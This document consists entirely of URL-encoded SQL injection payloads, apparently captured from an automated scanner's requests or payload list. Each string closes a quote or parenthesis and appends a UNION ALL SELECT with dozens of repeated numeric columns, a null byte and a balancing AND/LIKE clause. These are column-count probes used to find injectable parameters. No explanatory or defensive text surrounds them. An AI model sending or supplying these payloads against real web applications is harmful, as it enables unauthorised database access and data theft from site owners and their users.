-5845%22%20UNION%20ALL%20SELECT%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%2C%207033%00%20AND%20%22bxPd%22%3D%22bxPd -9996%22%20UNION%20ALL%20SELECT%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%2C%206390%00%20AND%20%22KhKC%22%3D%22KhKC -3290%22%20UNION%20ALL%20SELECT%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%00%20AND%20%22Tpto%22%3D%22Tpto -3665%22%20UNION%20ALL%20SELECT%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%2C%205613%00%20AND%20%22sPbO%22%3D%22sPbO -5579%22%29%20UNION%20ALL%20SELECT%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%2C%209568%00%20AND%20%28%22qloD%22%20LIKE%20%22qloD -2495%22%29%20UNION%20ALL%20SELECT%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%2C%208165%00%20AND%20%28%22rLRv%22%20LIKE%20%22rLRv -8573%22%29%20UNION%20ALL%20SELECT%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%2C%204583%00%20AND%20%28%22SdAH%22%20LIKE%20%22SdAH -6291%22%29%20UNION%20ALL%20SELECT%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%2C%205162%00%20AND%20%28%22TRqJ%22%20LIKE%20%22TRqJ -3126%22%29%20UNION%20ALL%20SELECT%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%2C%205132%00%20AND%20%28%22CvUO%22%20LIKE%20%22CvUO -3196%22%29%20UNION%20ALL%20SELECT%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%2C%203978%00%20AND%20%28%22VloR%22%20LIKE%20%22VloR -1071%22%29%20UNION%20ALL%20SELECT%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%00%20AND%20%28%22QiQE%22%20LIKE%20%22QiQE -7646%22%29%20UNION%20ALL%20SELECT%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%2C%207896%00%20AND%20%28%22sRMw%22%20LIKE%20%22sRMw -4344%22%29%20UNION%20ALL%20SELECT%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%2C%209579%00%20AND%20%28%22cxQN%22%20LIKE%20%22cxQN -5167%22%29%20UNION%20ALL%20SELECT%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%2C%205338%00%20AND%20%28%22GwdQ%22%20LIKE%20%22GwdQ -5144%22%29%29%20UNION%20ALL%20SELECT%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%2C%204240%00%20AND%20%28%28%22YSIY%22%20LIKE%20%22YSIY -8156%22%29%29%20UNION%20ALL%20SELECT%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%2C%207632%00%20AND%20%28%28%22giRY%22%20LIKE%20%22giRY -1494%22%29%29%20UNION%20ALL%20SELECT%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%2C%208239%00%20AND%20%28%28%22loIk%22%20LIKE%20%22loIk -3169%22%29%29%20UNION%20ALL%20SELECT%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%2C%202446%00%20AND%20%28%28%22kkfc%22%20LIKE%20%22kkfc -8375%22%29%29%20UNION%20ALL%20SELECT%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%2C%208891%00%20AND%20%28%28%22XOPz%22%20LIKE%20%22XOPz -5997%22%29%29%20UNION%20ALL%20SELECT%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%2C%206050%00%20AND%20%28%28%22YuLi%22%20LIKE%20%22YuLi -7411%22%29%29%20UNION%20ALL%20SELECT%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%2C%208901%00%20AND%20%28%28%22QFOm%22%20LIKE%20%22QFOm -2911%22%29%29%20UNION%20ALL%20SELECT%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%2C%206320%00%20AND%20%28%28%22eeAv%22%20LIKE%20%22eeAv -5733%22%29%29%20UNION%20ALL%20SELECT%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%00%20AND%20%28%28%22oJAx%22%20LIKE%20%22oJAx -8930%22%29%29%20UNION%20ALL%20SELECT%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%2C%202260%00%20AND%20%28%28%22hpaO%22%20LIKE%20%22hpaO -3231%22%29%29%29%20UNION%20ALL%20SELECT%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%2C%206470%00%20AND%20%28%28%28%22GKPE%22%20LIKE%20%22GKPE -2223%22%29%29%29%20UNION%20ALL%20SELECT%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%00%20AND%20%28%28%28%22VkbX%22%20LIKE%20%22VkbX -2771%22%29%29%29%20UNION%20ALL%20SELECT%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%2C%208807%00%20AND%20%28%28%28%22ZGZx%22%20LIKE%20%22ZGZx -2076%22%29%29%29%20UNION%20ALL%20SELECT%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%2C%202572%00%20AND%20%28%28%28%22ATHZ%22%20LIKE%20%22ATHZ -6772%22%29%29%29%20UNION%20ALL%20SELECT%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%2C%209950%00%20AND%20%28%28%28%22qVYG%22%20LIKE%20%22qVYG -4888%22%29%29%29%20UNION%20ALL%20SELECT%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%00%20AND%20%28%28%28%22ybSu%22%20LIKE%20%22ybSu -6572%22%29%29%29%20UNION%20ALL%20SELECT%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%2C%202722%00%20AND%20%28%28%28%22AgpL%22%20LIKE%20%22AgpL -1661%22%29%29%29%20UNION%20ALL%20SELECT%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%00%20AND%20%28%28%28%22zXYS%22%20LIKE%20%22zXYS -1431%22%29%29%29%20UNION%20ALL%20SELECT%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%2C%201774%00%20AND%20%28%28%28%22XqJH%22%20LIKE%20%22XqJH -1354%22%29%29%29%20UNION%20ALL%20SELECT%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%2C%205661%00%20AND%20%28%28%28%22EMkL%22%20LIKE%20%22EMkL -6159%22%20UNION%20ALL%20SELECT%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%2C%203722%00%20AND%20%22PPkl%22%20LIKE%20%22PPkl -6848%22%20UNION%20ALL%20SELECT%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%00%20AND%20%22bZmI%22%20LIKE%20%22bZmI -5380%22%20UNION%20ALL%20SELECT%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%2C%205052%00%20AND%20%22KfeE%22%20LIKE%20%22KfeE -3062%22%20UNION%20ALL%20SELECT%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%2C%206377%00%20AND%20%22nLkL%22%20LIKE%20%22nLkL -5885%22%20UNION%20ALL%20SELECT%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%2C%202174%00%20AND%20%22YmzL%22%20LIKE%20%22YmzL -2106%22%20UNION%20ALL%20SELECT%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%2C%201837%00%20AND%20%22yrgP%22%20LIKE%20%22yrgP -3778%22%20UNION%20ALL%20SELECT%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%2C%206473%00%20AND%20%22Worb%22%20LIKE%20%22Worb -8352%22%20UNION%20ALL%20SELECT%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%2C%201285%00%20AND%20%22PnPH%22%20LIKE%20%22PnPH -4973%22%20UNION%20ALL%20SELECT%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%2C%203806%00%20AND%20%22yAxP%22%20LIKE%20%22yAxP -2082%22%20UNION%20ALL%20SELECT%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%00%20AND%20%22kESf%22%20LIKE%20%22kESf -1903%29%20WHERE%209946%3D9946%20UNION%20ALL%20SELECT%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%2C%209946%00 -5392%29%20WHERE%206744%3D6744%20UNION%20ALL%20SELECT%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%2C%206744%00 